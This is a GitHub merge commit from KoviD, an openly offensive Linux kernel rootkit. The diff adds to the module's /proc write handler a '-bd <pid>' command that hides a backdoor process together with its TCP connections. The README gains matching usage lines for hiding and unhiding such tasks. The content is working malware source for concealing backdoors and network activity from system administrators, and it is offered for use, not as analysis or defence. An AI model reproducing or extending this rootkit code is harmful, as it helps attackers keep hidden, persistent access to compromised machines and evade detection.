Merge pull request #90 from carloslack/kvdev

Kvdev
carloslack · May 8, 2024 · 0a57646 · 0a57646
2 parents f5f9b19 + f0cee52
commit 0a57646
Show file tree

Hide file tree

Showing 2 changed files with 16 additions and 2 deletions.
diff --git a/README.md b/README.md
@@ -28,7 +28,7 @@
 
 Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master)
 
-### 1.1 Compatible systems
+### 1.1 Mostly tested against
 
     CentOS Linux release 8.3.2011
     4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
@@ -152,6 +152,10 @@ Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master)
 
     You can hide/unhide processes using the /proc/mytest interface.
     For example, to hide a task, run: $ echo 14886 >/proc/mytest.
+    If a task is a backdoor that needs tcp hiding, run:
+        $ echo "-bd <pid>" >/proc/mytest.
+    Unhiding is the same as for regular tasks:
+        $ echo "<PID>" >/proc/mytest
 
 ### 3.3 Hide module
 

diff --git a/src/kovid.c b/src/kovid.c
@@ -465,8 +465,18 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
 
         buf[strcspn(buf, "\r\n")] = 0;
 
+        /* Hide PID as backdoor */
+        if(!strncmp(buf, "-bd", MIN(3, size))) {
+            char *tmp = &buf[4];
+            int val = 0;
+            tmp[strcspn(tmp, " ")] = 0;
+            if (kstrtoint(tmp, 10, &val)) {
+                prerr("Failed kstrtoint\n");
+            } else {
+                kv_hide_task_by_pid(val, 1, CHILDREN);
+            }
         /* hide kovid module */
-        if(!strcmp(buf, "-h") && !op_lock) {
+        } else if(!strcmp(buf, "-h") && !op_lock) {
             static unsigned int msg_lock = 0;
             if(!msg_lock) {
                 msg_lock = 1;